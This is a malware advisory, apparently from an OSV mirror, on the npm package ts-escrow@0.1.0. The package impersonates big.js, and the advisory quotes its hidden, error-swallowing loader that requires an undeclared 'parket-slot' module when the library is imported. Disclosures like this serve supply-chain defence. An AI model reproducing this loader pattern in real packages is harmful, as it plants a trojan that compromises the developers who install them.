ts-escrow @0.1.0
Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC
OSV ID
MAL-2026-6320
Ecosystem
npm
Summary
ts-escrow@0.1.0 is a verbatim copy of the big.js library (README, repository URL, author, version banner, and description all impersonate MikeMcl/big.js) republished under an unrelated name. Inserted between unrelated method definitions in big.js and big.mjs is a top-level, error-swallowing loader: try { const doc = require('parket-slot'); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { } . The 'parket-slot' module is not declared in package.json. The manifest instead declares an unrelated dependency 'log-taker1' (^0.1.0), also unrelated to big.js's documented zero-dependency posture. Any developer who installs ts-escrow and require()s it triggers loading of an attacker-controlled companion module at import time, with errors silently swallowed to evade detection. The combination of library impersonation, hidden require() of an undeclared package, and silent error handling is the textbook supply-chain trojan loader pattern.
Source: amazon-inspector (9607025df61aa1728bceb1a71534460a9e9edf2f3cd1d4eedd533238786577c2)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.